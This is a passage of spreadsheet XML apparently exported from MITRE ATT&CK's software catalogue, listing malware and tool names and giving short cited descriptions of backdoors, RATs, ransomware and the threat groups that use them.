    <t>Ixeshe</t>
  </si>
  <si>
    <t>JCry</t>
  </si>
  <si>
    <t>JHUHUGIT</t>
  </si>
  <si>
    <t>JPIN</t>
  </si>
  <si>
    <t>JSS Loader</t>
  </si>
  <si>
    <t>Janicab</t>
  </si>
  <si>
    <t>Javali</t>
  </si>
  <si>
    <t>KARAE</t>
  </si>
  <si>
    <t>KEYMARBLE</t>
  </si>
  <si>
    <t>KGH_SPY</t>
  </si>
  <si>
    <t>KOCTOPUS</t>
  </si>
  <si>
    <t>KOMPROGO</t>
  </si>
  <si>
    <t>KONNI</t>
  </si>
  <si>
    <t>Kasidet</t>
  </si>
  <si>
    <t>Kazuar</t>
  </si>
  <si>
    <t>Kerrdown</t>
  </si>
  <si>
    <t>Kessel</t>
  </si>
  <si>
    <t>Kevin</t>
  </si>
  <si>
    <t>KeyBoy</t>
  </si>
  <si>
    <t>Keydnap</t>
  </si>
  <si>
    <t>KillDisk</t>
  </si>
  <si>
    <t>Kinsing</t>
  </si>
  <si>
    <t>Kivars</t>
  </si>
  <si>
    <t>Koadic</t>
  </si>
  <si>
    <t>Kobalos</t>
  </si>
  <si>
    <t>Komplex</t>
  </si>
  <si>
    <t>Kwampirs</t>
  </si>
  <si>
    <t>LOWBALL</t>
  </si>
  <si>
    <t>LaZagne</t>
  </si>
  <si>
    <t>LightNeuron</t>
  </si>
  <si>
    <t>Linfo</t>
  </si>
  <si>
    <t>Linux Rabbit</t>
  </si>
  <si>
    <t>LiteDuke</t>
  </si>
  <si>
    <t>LitePower</t>
  </si>
  <si>
    <t>Lizar</t>
  </si>
  <si>
    <t>LoJax</t>
  </si>
  <si>
    <t>LockerGoga</t>
  </si>
  <si>
    <t>Lokibot</t>
  </si>
  <si>
    <t>LookBack</t>
  </si>
  <si>
    <t>LoudMiner</t>
  </si>
  <si>
    <t>Lslsass</t>
  </si>
  <si>
    <t>Lucifer</t>
  </si>
  <si>
    <t>Lurid</t>
  </si>
  <si>
    <t>MCMD</t>
  </si>
  <si>
    <t>MESSAGETAP</t>
  </si>
  <si>
    <t>MURKYTOP</t>
  </si>
  <si>
    <t>MacMa</t>
  </si>
  <si>
    <t>MacSpy</t>
  </si>
  <si>
    <t>Machete</t>
  </si>
  <si>
    <t>MailSniper</t>
  </si>
  <si>
    <t>MarkiRAT</t>
  </si>
  <si>
    <t>Matryoshka</t>
  </si>
  <si>
    <t>Maze</t>
  </si>
  <si>
    <t>MechaFlounder</t>
  </si>
  <si>
    <t>MegaCortex</t>
  </si>
  <si>
    <t>Melcoz</t>
  </si>
  <si>
    <t>Metamorfo</t>
  </si>
  <si>
    <t>Meteor</t>
  </si>
  <si>
    <t>Micropsia</t>
  </si>
  <si>
    <t>Milan</t>
  </si>
  <si>
    <t>MimiPenguin</t>
  </si>
  <si>
    <t>Mimikatz</t>
  </si>
  <si>
    <t>Miner-C</t>
  </si>
  <si>
    <t>MiniDuke</t>
  </si>
  <si>
    <t>MirageFox</t>
  </si>
  <si>
    <t>Mis-Type</t>
  </si>
  <si>
    <t>Misdat</t>
  </si>
  <si>
    <t>Mivast</t>
  </si>
  <si>
    <t>MobileOrder</t>
  </si>
  <si>
    <t>MoleNet</t>
  </si>
  <si>
    <t>Mongall</t>
  </si>
  <si>
    <t>MoonWind</t>
  </si>
  <si>
    <t>More_eggs</t>
  </si>
  <si>
    <t>Mori</t>
  </si>
  <si>
    <t>Mosquito</t>
  </si>
  <si>
    <t>Mythic</t>
  </si>
  <si>
    <t>NBTscan</t>
  </si>
  <si>
    <t>NDiskMonitor</t>
  </si>
  <si>
    <t>NETEAGLE</t>
  </si>
  <si>
    <t>NETWIRE</t>
  </si>
  <si>
    <t>NOKKI</t>
  </si>
  <si>
    <t>Naid</t>
  </si>
  <si>
    <t>NanHaiShu</t>
  </si>
  <si>
    <t>NanoCore</t>
  </si>
  <si>
    <t>NativeZone</t>
  </si>
  <si>
    <t>NavRAT</t>
  </si>
  <si>
    <t>Nebulae</t>
  </si>
  <si>
    <t>Neoichor</t>
  </si>
  <si>
    <t>Nerex</t>
  </si>
  <si>
    <t>Net</t>
  </si>
  <si>
    <t>Net Crawler</t>
  </si>
  <si>
    <t>NetTraveler</t>
  </si>
  <si>
    <t>Netwalker</t>
  </si>
  <si>
    <t>Ngrok</t>
  </si>
  <si>
    <t>Nidiran</t>
  </si>
  <si>
    <t>Nltest</t>
  </si>
  <si>
    <t>NotPetya</t>
  </si>
  <si>
    <t>OLDBAIT</t>
  </si>
  <si>
    <t>OSInfo</t>
  </si>
  <si>
    <t>OSX/Shlayer</t>
  </si>
  <si>
    <t>OSX_OCEANLOTUS.D</t>
  </si>
  <si>
    <t>ObliqueRAT</t>
  </si>
  <si>
    <t>OceanSalt</t>
  </si>
  <si>
    <t>Octopus</t>
  </si>
  <si>
    <t>Okrum</t>
  </si>
  <si>
    <t>Olympic Destroyer</t>
  </si>
  <si>
    <t>OnionDuke</t>
  </si>
  <si>
    <t>OopsIE</t>
  </si>
  <si>
    <t>Orz</t>
  </si>
  <si>
    <t>Out1</t>
  </si>
  <si>
    <t>OutSteel</t>
  </si>
  <si>
    <t>OwaAuth</t>
  </si>
  <si>
    <t>P.A.S. Webshell</t>
  </si>
  <si>
    <t>P2P ZeuS</t>
  </si>
  <si>
    <t>P8RAT</t>
  </si>
  <si>
    <t>PHOREAL</t>
  </si>
  <si>
    <t>PLAINTEE</t>
  </si>
  <si>
    <t>PLEAD</t>
  </si>
  <si>
    <t>POORAIM</t>
  </si>
  <si>
    <t>POSHSPY</t>
  </si>
  <si>
    <t>POWERSOURCE</t>
  </si>
  <si>
    <t>POWERSTATS</t>
  </si>
  <si>
    <t>POWERTON</t>
  </si>
  <si>
    <t>POWRUNER</t>
  </si>
  <si>
    <t>PS1</t>
  </si>
  <si>
    <t>PUNCHBUGGY</t>
  </si>
  <si>
    <t>PUNCHTRACK</t>
  </si>
  <si>
    <t>Pandora</t>
  </si>
  <si>
    <t>Pasam</t>
  </si>
  <si>
    <t>Pass-The-Hash Toolkit</t>
  </si>
  <si>
    <t>Pay2Key</t>
  </si>
  <si>
    <t>PcShare</t>
  </si>
  <si>
    <t>Peirates</t>
  </si>
  <si>
    <t>Penquin</t>
  </si>
  <si>
    <t>Peppy</t>
  </si>
  <si>
    <t>Pillowmint</t>
  </si>
  <si>
    <t>PinchDuke</t>
  </si>
  <si>
    <t>Ping</t>
  </si>
  <si>
    <t>PingPull</t>
  </si>
  <si>
    <t>PipeMon</t>
  </si>
  <si>
    <t>Pisloader</t>
  </si>
  <si>
    <t>PlugX</t>
  </si>
  <si>
    <t>PoetRAT</t>
  </si>
  <si>
    <t>PoisonIvy</t>
  </si>
  <si>
    <t>PolyglotDuke</t>
  </si>
  <si>
    <t>Pony</t>
  </si>
  <si>
    <t>PoshC2</t>
  </si>
  <si>
    <t>PowGoop</t>
  </si>
  <si>
    <t>Power Loader</t>
  </si>
  <si>
    <t>PowerDuke</t>
  </si>
  <si>
    <t>PowerLess</t>
  </si>
  <si>
    <t>PowerPunch</t>
  </si>
  <si>
    <t>PowerShower</t>
  </si>
  <si>
    <t>PowerSploit</t>
  </si>
  <si>
    <t>PowerStallion</t>
  </si>
  <si>
    <t>Prikormka</t>
  </si>
  <si>
    <t>ProLock</t>
  </si>
  <si>
    <t>Proton</t>
  </si>
  <si>
    <t>Proxysvc</t>
  </si>
  <si>
    <t>PsExec</t>
  </si>
  <si>
    <t>Psylo</t>
  </si>
  <si>
    <t>Pteranodon</t>
  </si>
  <si>
    <t>Pupy</t>
  </si>
  <si>
    <t>PyDCrypt</t>
  </si>
  <si>
    <t>Pysa</t>
  </si>
  <si>
    <t>QUADAGENT</t>
  </si>
  <si>
    <t>QakBot</t>
  </si>
  <si>
    <t>QuasarRAT</t>
  </si>
  <si>
    <t>QuietSieve</t>
  </si>
  <si>
    <t>RARSTONE</t>
  </si>
  <si>
    <t>RATANKBA</t>
  </si>
  <si>
    <t>RCSession</t>
  </si>
  <si>
    <t>RDAT</t>
  </si>
  <si>
    <t>RDFSNIFFER</t>
  </si>
  <si>
    <t>REvil</t>
  </si>
  <si>
    <t>RGDoor</t>
  </si>
  <si>
    <t>RIPTIDE</t>
  </si>
  <si>
    <t>ROADTools</t>
  </si>
  <si>
    <t>ROCKBOOT</t>
  </si>
  <si>
    <t>ROKRAT</t>
  </si>
  <si>
    <t>RTM</t>
  </si>
  <si>
    <t>Ragnar Locker</t>
  </si>
  <si>
    <t>Raindrop</t>
  </si>
  <si>
    <t>RainyDay</t>
  </si>
  <si>
    <t>Ramsay</t>
  </si>
  <si>
    <t>RawDisk</t>
  </si>
  <si>
    <t>RawPOS</t>
  </si>
  <si>
    <t>Rclone</t>
  </si>
  <si>
    <t>Reaver</t>
  </si>
  <si>
    <t>RedLeaves</t>
  </si>
  <si>
    <t>Reg</t>
  </si>
  <si>
    <t>RegDuke</t>
  </si>
  <si>
    <t>Regin</t>
  </si>
  <si>
    <t>Remcos</t>
  </si>
  <si>
    <t>Remexi</t>
  </si>
  <si>
    <t>RemoteCMD</t>
  </si>
  <si>
    <t>RemoteUtilities</t>
  </si>
  <si>
    <t>Remsec</t>
  </si>
  <si>
    <t>Responder</t>
  </si>
  <si>
    <t>Revenge RAT</t>
  </si>
  <si>
    <t>Rifdoor</t>
  </si>
  <si>
    <t>Rising Sun</t>
  </si>
  <si>
    <t>RobbinHood</t>
  </si>
  <si>
    <t>RogueRobin</t>
  </si>
  <si>
    <t>Rover</t>
  </si>
  <si>
    <t>Ruler</t>
  </si>
  <si>
    <t>RunningRAT</t>
  </si>
  <si>
    <t>Ryuk</t>
  </si>
  <si>
    <t>S-Type</t>
  </si>
  <si>
    <t>SDBbot</t>
  </si>
  <si>
    <t>SDelete</t>
  </si>
  <si>
    <t>SEASHARPEE</t>
  </si>
  <si>
    <t>SHARPSTATS</t>
  </si>
  <si>
    <t>SHIPSHAPE</t>
  </si>
  <si>
    <t>SHOTPUT</t>
  </si>
  <si>
    <t>SHUTTERSPEED</t>
  </si>
  <si>
    <t>SILENTTRINITY</t>
  </si>
  <si>
    <t>SLOTHFULMEDIA</t>
  </si>
  <si>
    <t>SLOWDRIFT</t>
  </si>
  <si>
    <t>SMOKEDHAM</t>
  </si>
  <si>
    <t>SNUGRIDE</t>
  </si>
  <si>
    <t>SOUNDBITE</t>
  </si>
  <si>
    <t>SPACESHIP</t>
  </si>
  <si>
    <t>SQLRat</t>
  </si>
  <si>
    <t>STARWHALE</t>
  </si>
  <si>
    <t>SUGARDUMP</t>
  </si>
  <si>
    <t>SUGARUSH</t>
  </si>
  <si>
    <t>SUNBURST</t>
  </si>
  <si>
    <t>SUNSPOT</t>
  </si>
  <si>
    <t>SUPERNOVA</t>
  </si>
  <si>
    <t>SYNful Knock</t>
  </si>
  <si>
    <t>SYSCON</t>
  </si>
  <si>
    <t>Saint Bot</t>
  </si>
  <si>
    <t>Sakula</t>
  </si>
  <si>
    <t>SamSam</t>
  </si>
  <si>
    <t>SeaDuke</t>
  </si>
  <si>
    <t>Seasalt</t>
  </si>
  <si>
    <t>ServHelper</t>
  </si>
  <si>
    <t>Seth-Locker</t>
  </si>
  <si>
    <t>ShadowPad</t>
  </si>
  <si>
    <t>Shamoon</t>
  </si>
  <si>
    <t>Shark</t>
  </si>
  <si>
    <t>SharpStage</t>
  </si>
  <si>
    <t>ShimRat</t>
  </si>
  <si>
    <t>ShimRatReporter</t>
  </si>
  <si>
    <t>Sibot</t>
  </si>
  <si>
    <t>SideTwist</t>
  </si>
  <si>
    <t>Siloscape</t>
  </si>
  <si>
    <t>Skeleton Key</t>
  </si>
  <si>
    <t>Skidmap</t>
  </si>
  <si>
    <t>Sliver</t>
  </si>
  <si>
    <t>Small Sieve</t>
  </si>
  <si>
    <t>Smoke Loader</t>
  </si>
  <si>
    <t>Socksbot</t>
  </si>
  <si>
    <t>SodaMaster</t>
  </si>
  <si>
    <t>SombRAT</t>
  </si>
  <si>
    <t>SoreFang</t>
  </si>
  <si>
    <t>Spark</t>
  </si>
  <si>
    <t>SpeakUp</t>
  </si>
  <si>
    <t>SpicyOmelette</t>
  </si>
  <si>
    <t>Squirrelwaffle</t>
  </si>
  <si>
    <t>SslMM</t>
  </si>
  <si>
    <t>Starloader</t>
  </si>
  <si>
    <t>StoneDrill</t>
  </si>
  <si>
    <t>StreamEx</t>
  </si>
  <si>
    <t>StrifeWater</t>
  </si>
  <si>
    <t>StrongPity</t>
  </si>
  <si>
    <t>Stuxnet</t>
  </si>
  <si>
    <t>Sykipot</t>
  </si>
  <si>
    <t>SynAck</t>
  </si>
  <si>
    <t>Sys10</t>
  </si>
  <si>
    <t>SysUpdate</t>
  </si>
  <si>
    <t>Systeminfo</t>
  </si>
  <si>
    <t>T9000</t>
  </si>
  <si>
    <t>TAINTEDSCRIBE</t>
  </si>
  <si>
    <t>TDTESS</t>
  </si>
  <si>
    <t>TEARDROP</t>
  </si>
  <si>
    <t>TEXTMATE</t>
  </si>
  <si>
    <t>TINYTYPHON</t>
  </si>
  <si>
    <t>TSCookie</t>
  </si>
  <si>
    <t>TURNEDUP</t>
  </si>
  <si>
    <t>TYPEFRAME</t>
  </si>
  <si>
    <t>Taidoor</t>
  </si>
  <si>
    <t>TajMahal</t>
  </si>
  <si>
    <t>Tarrask</t>
  </si>
  <si>
    <t>Tasklist</t>
  </si>
  <si>
    <t>ThiefQuest</t>
  </si>
  <si>
    <t>ThreatNeedle</t>
  </si>
  <si>
    <t>TinyTurla</t>
  </si>
  <si>
    <t>TinyZBot</t>
  </si>
  <si>
    <t>Tomiris</t>
  </si>
  <si>
    <t>Tor</t>
  </si>
  <si>
    <t>Torisma</t>
  </si>
  <si>
    <t>TrailBlazer</t>
  </si>
  <si>
    <t>TrickBot</t>
  </si>
  <si>
    <t>Trojan.Karagany</t>
  </si>
  <si>
    <t>Trojan.Mebromi</t>
  </si>
  <si>
    <t>Truvasys</t>
  </si>
  <si>
    <t>Turian</t>
  </si>
  <si>
    <t>UACMe</t>
  </si>
  <si>
    <t>UBoatRAT</t>
  </si>
  <si>
    <t>UPPERCUT</t>
  </si>
  <si>
    <t>USBStealer</t>
  </si>
  <si>
    <t>USBferry</t>
  </si>
  <si>
    <t>Umbreon</t>
  </si>
  <si>
    <t>Unknown Logger</t>
  </si>
  <si>
    <t>Uroburos</t>
  </si>
  <si>
    <t>Ursnif</t>
  </si>
  <si>
    <t>VBShower</t>
  </si>
  <si>
    <t>VERMIN</t>
  </si>
  <si>
    <t>Valak</t>
  </si>
  <si>
    <t>VaporRage</t>
  </si>
  <si>
    <t>Vasport</t>
  </si>
  <si>
    <t>Volgmer</t>
  </si>
  <si>
    <t>WEBC2</t>
  </si>
  <si>
    <t>WINDSHIELD</t>
  </si>
  <si>
    <t>WINERACK</t>
  </si>
  <si>
    <t>WannaCry</t>
  </si>
  <si>
    <t>WarzoneRAT</t>
  </si>
  <si>
    <t>WastedLocker</t>
  </si>
  <si>
    <t>Waterbear</t>
  </si>
  <si>
    <t>WellMail</t>
  </si>
  <si>
    <t>WellMess</t>
  </si>
  <si>
    <t>Wevtutil</t>
  </si>
  <si>
    <t>WhisperGate</t>
  </si>
  <si>
    <t>Wiarp</t>
  </si>
  <si>
    <t>WinMM</t>
  </si>
  <si>
    <t>WindTail</t>
  </si>
  <si>
    <t>Windows Credential Editor</t>
  </si>
  <si>
    <t>Winexe</t>
  </si>
  <si>
    <t>Wingbird</t>
  </si>
  <si>
    <t>Winnti for Linux</t>
  </si>
  <si>
    <t>Winnti for Windows</t>
  </si>
  <si>
    <t>Wiper</t>
  </si>
  <si>
    <t>XAgentOSX</t>
  </si>
  <si>
    <t>XCSSET</t>
  </si>
  <si>
    <t>XTunnel</t>
  </si>
  <si>
    <t>Xbash</t>
  </si>
  <si>
    <t>YAHOYAH</t>
  </si>
  <si>
    <t>ZLib</t>
  </si>
  <si>
    <t>Zebrocy</t>
  </si>
  <si>
    <t>ZeroT</t>
  </si>
  <si>
    <t>Zeroaccess</t>
  </si>
  <si>
    <t>Zeus Panda</t>
  </si>
  <si>
    <t>Zox</t>
  </si>
  <si>
    <t>ZxShell</t>
  </si>
  <si>
    <t>ZxxZ</t>
  </si>
  <si>
    <t>adbupd</t>
  </si>
  <si>
    <t>at</t>
  </si>
  <si>
    <t>build_downer</t>
  </si>
  <si>
    <t>ccf32</t>
  </si>
  <si>
    <t>certutil</t>
  </si>
  <si>
    <t>cmd</t>
  </si>
  <si>
    <t>down_new</t>
  </si>
  <si>
    <t>dsquery</t>
  </si>
  <si>
    <t>esentutl</t>
  </si>
  <si>
    <t>ftp</t>
  </si>
  <si>
    <t>gh0st RAT</t>
  </si>
  <si>
    <t>gsecdump</t>
  </si>
  <si>
    <t>hcdLoader</t>
  </si>
  <si>
    <t>httpclient</t>
  </si>
  <si>
    <t>iKitten</t>
  </si>
  <si>
    <t>ifconfig</t>
  </si>
  <si>
    <t>ipconfig</t>
  </si>
  <si>
    <t>jRAT</t>
  </si>
  <si>
    <t>macOS.OSAMiner</t>
  </si>
  <si>
    <t>meek</t>
  </si>
  <si>
    <t>nbtstat</t>
  </si>
  <si>
    <t>netsh</t>
  </si>
  <si>
    <t>netstat</t>
  </si>
  <si>
    <t>njRAT</t>
  </si>
  <si>
    <t>pngdowner</t>
  </si>
  <si>
    <t>pwdump</t>
  </si>
  <si>
    <t>route</t>
  </si>
  <si>
    <t>schtasks</t>
  </si>
  <si>
    <t>spwebmember</t>
  </si>
  <si>
    <t>sqlmap</t>
  </si>
  <si>
    <t>xCaon</t>
  </si>
  <si>
    <t>xCmd</t>
  </si>
  <si>
    <t>yty</t>
  </si>
  <si>
    <t>zwShell</t>
  </si>
  <si>
    <t>[3PARA RAT](https://attack.mitre.org/software/S0066) is a remote access tool (RAT) programmed in C++ that has been used by [Putter Panda](https://attack.mitre.org/groups/G0024). (Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[4H RAT](https://attack.mitre.org/software/S0065) is malware that has been used by [Putter Panda](https://attack.mitre.org/groups/G0024) since at least 2007. (Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) is a PowerShell-based framework for administering, enumerating, and exploiting Azure Active Directory. The tool is publicly available on GitHub.(Citation: AADInternals Github)(Citation: AADInternals Documentation)</t>
  </si>
  <si>
    <t>[ABK](https://attack.mitre.org/software/S0469) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) is a spying backdoor that has been used by [APT28](https://attack.mitre.org/groups/G0007) from at least 2012 to 2016. It is generally used for long-term espionage and is deployed on targets deemed interesting after a reconnaissance phase. (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[ASPXSpy](https://attack.mitre.org/software/S0073) is a Web shell. It has been modified by [Threat Group-3390](https://attack.mitre.org/groups/G0027) actors to create the ASPXTool version. (Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[Action RAT](https://attack.mitre.org/software/S1028) is a  remote access tool written in Delphi that has been used by [SideCopy](https://attack.mitre.org/groups/G1008) since at least December 2021 against Indian and Afghani government personnel.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>[AdFind](https://attack.mitre.org/software/S0552) is a free command-line query tool that can be used for gathering information from Active Directory.(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: FireEye FIN6 Apr 2019)(Citation: FireEye Ryuk and Trickbot January 2019)</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) is a spyware Trojan written for the .NET framework that has been observed since at least 2014.(Citation: Fortinet Agent Tesla April 2018)(Citation: Bitdefender Agent Tesla April 2020)(Citation: Malwarebytes Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>[Agent.btz](https://attack.mitre.org/software/S0092) is a worm that primarily spreads itself via removable devices such as USB drives. It reportedly infected U.S. military networks in 2008. (Citation: Securelist Agent.btz)</t>
  </si>
  <si>
    <t>[Amadey](https://attack.mitre.org/software/S1025) is a Trojan bot that has been used since at least October 2018.(Citation: Korean FSI TA505 2020)(Citation: BlackBerry Amadey 2020)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) is one of a family of backdoor malware that has been used in conjunction with [TrickBot](https://attack.mitre.org/software/S0266) on selected high profile targets since at least 2018.(Citation: Cyberreason Anchor December 2019)(Citation: Medium Anchor DNS July 2020)</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) is a family of downloaders initially discovered in 2018 embedded within trojanized cryptocurrency applications. [AppleJeus](https://attack.mitre.org/software/S0584) has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032), targeting companies in the energy, finance, government, industry, technology, and telecommunications sectors, and several countries including the United States, United Kingdom, South Korea, Australia, Brazil, New Zealand, and Russia. [AppleJeus](https://attack.mitre.org/software/S0584) has been used to distribute the [FALLCHILL](https://attack.mitre.org/software/S0181) RAT.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) is a backdoor that has been used by [Kimsuky](https://attack.mitre.org/groups/G0094) to target South Korean government, academic, and commercial  targets since at least 2021.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) is a custom backdoor that has been used by [Naikon](https://attack.mitre.org/groups/G0019) since approximately 2017.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Arp](https://attack.mitre.org/software/S0099) displays and modifies information about a system's Address Resolution Protocol (ARP) cache. (Citation: TechNet Arp)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) is a Trojan and information stealer known to affect companies in Europe, Brazil, and throughout Latin America. It has been known publicly since at least late 2017. (Citation: Cybereason Astaroth Feb 2019)(Citation: Cofense Astaroth Sept 2018)(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) is a Windows-based espionage platform that has been seen in use since 2013. [Attor](https://attack.mitre.org/software/S0438) has a loadable plugin architecture to customize functionality for specific targets.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[AuTo Stealer](https://attack.mitre.org/software/S1029) is malware written in C++ has been used by [SideCopy](https://attack.mitre.org/groups/G1008) since at least December 2021 to target government agencies and personnel in India and Afghanistan.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) is a malicious DLL that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) during their 2018 attacks.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>[AutoIt backdoor](https://attack.mitre.org/software/S0129) is malware that has been used by the actors responsible for the MONSOON campaign. The actors frequently used it in weaponized .pps files exploiting CVE-2014-6352. (Citation: Forcepoint Monsoon) This malware makes use of the legitimate scripting language for Windows GUI automation with the same name.</t>
  </si>
  <si>
    <t>[Avaddon](https://attack.mitre.org/software/S0640) is ransomware written in C++ that has been offered as Ransomware-as-a-Service (RaaS) since at least June 2020.(Citation: Awake Security Avaddon)(Citation: Arxiv Avaddon Feb 2021)</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) is a commercial Trojan that is used to steal information from compromised hosts. [Azorult](https://attack.mitre.org/software/S0344) has been observed in the wild as early as 2016.
In July 2018, [Azorult](https://attack.mitre.org/software/S0344) was seen used in a spearphishing campaign against targets in North America. [Azorult](https://attack.mitre.org/software/S0344) has been seen used for cryptocurrency theft. (Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)</t>
  </si>
  <si>
    <t>[BACKSPACE](https://attack.mitre.org/software/S0031) is a backdoor used by [APT30](https://attack.mitre.org/groups/G0013) that dates back to at least 2005. (Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[BADCALL](https://attack.mitre.org/software/S0245) is a Trojan malware variant used by the group [Lazarus Group](https://attack.mitre.org/groups/G0032). (Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>[BADFLICK](https://attack.mitre.org/software/S0642) is a backdoor used by [Leviathan](https://attack.mitre.org/groups/G0065) in spearphishing campaigns first reported in 2018 that targeted the U.S. engineering and maritime industries.(Citation: FireEye Periscope March 2018)(Citation: Accenture MUDCARP March 2019)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) is malware that has been used by the actors responsible for the [Patchwork](https://attack.mitre.org/groups/G0040) campaign. Its name was given due to its use of RSS feeds, forums, and blogs for command and control. (Citation: Forcepoint Monsoon) (Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[BBK](https://attack.mitre.org/software/S0470) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) is malware with remote access tool functionality that has been used in targeted compromises. (Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) is a backdoor that has been used by [APT1](https://attack.mitre.org/groups/G0006) since as early as 2007. (Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[BITSAdmin](https://attack.mitre.org/software/S0190) is a command line tool used to create and manage [BITS Jobs](https://attack.mitre.org/techniques/T1197). (Citation: Microsoft BITSAdmin)</t>
  </si>
  <si>
    <t>[BLACKCOFFEE](https://attack.mitre.org/software/S0069) is malware that has been used by several Chinese groups since at least 2013. (Citation: FireEye APT17) (Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) is a remote access Trojan that has been used by the North Korean government since at least early 2020 in cyber operations against defense, engineering, and government organizations in Western Europe and the US.(Citation: US-CERT BLINDINGCAN Aug 2020)(Citation: NHS UK BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLUELIGHT](https://attack.mitre.org/software/S0657) is a remote access Trojan used by [APT37](https://attack.mitre.org/groups/G0067) that was first observed in early 2021.(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t>[BONDUPDATER](https://attack.mitre.org/software/S0360) is a PowerShell backdoor used by [OilRig](https://attack.mitre.org/groups/G0049). It was first observed in November 2017 during targeting of a Middle Eastern government organization, and an updated version was observed in August 2018 being used to target a government organization with spearphishing emails.(Citation: FireEye APT34 Dec 2017)(Citation: Palo Alto OilRig Sep 2018)</t>
  </si>
  <si>
    <t>[BOOSTWRITE](https://attack.mitre.org/software/S0415) is a loader crafted to be launched via abuse of the DLL search order of applications used by [FIN7](https://attack.mitre.org/groups/G0046).(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>[BOOTRASH](https://attack.mitre.org/software/S0114) is a [Bootkit](https://attack.mitre.org/techniques/T1542/003) that targets Windows operating systems. It has been used by threat actors that target the financial sector.(Citation: Mandiant M Trends 2016)(Citation: FireEye Bootkits)(Citation: FireEye BOOTRASH SANS)</t>
  </si>
  <si>
    <t>[BS2005](https://attack.mitre.org/software/S0014) is malware that was used by [Ke3chang](https://attack.mitre.org/groups/G0004) in spearphishing campaigns since at least 2011. (Citation: Mandiant Operation Ke3chang November 2014)</t>
  </si>
  <si>
    <t>[BUBBLEWRAP](https://attack.mitre.org/software/S0043) is a full-featured, second-stage backdoor used by the [admin@338](https://attack.mitre.org/groups/G0018) group. It is set to run when the system boots and includes functionality to check, upload, and register plug-ins that can further enhance its capabilities. (Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>[Babuk](https://attack.mitre.org/software/S0638) is a Ransomware-as-a-service (RaaS) malware that has been used since at least 2021. The operators of [Babuk](https://attack.mitre.org/software/S0638) employ a "Big Game Hunting" approach to targeting major enterprises and operate a leak site to post stolen data as part of their extortion scheme.(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: McAfee Babuk February 2021)(Citation: CyberScoop Babuk February 2021)</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) is a Microsoft Visual Basic (VB) script-based malware family that is believed to be associated with several North Korean campaigns. (Citation: Unit42 BabyShark Feb 2019)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) is a custom Trojan with a flexible plugin architecture that has been used by [Patchwork](https://attack.mitre.org/groups/G0040).(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) is a modular backdoor that used by [Dragonfly](https://attack.mitre.org/groups/G0035) against energy companies since at least 2013. [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) was distributed via supply chain compromise, and included specialized modules to enumerate and map ICS-specific systems, processes, and protocols.(Citation: Symantec Dragonfly)(Citation: Gigamon Berserk Bear October 2021)(Citation: Symantec Dragonfly Sept 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[Bad Rabbit](https://attack.mitre.org/software/S0606) is a self-propagating ransomware that affected the Ukrainian transportation sector in 2017. [Bad Rabbit](https://attack.mitre.org/software/S0606) has also targeted organizations and consumers in Russia. (Citation: Secure List Bad Rabbit)(Citation: ESET Bad Rabbit)(Citation: Dragos IT ICS Ransomware) </t>
  </si>
  <si>
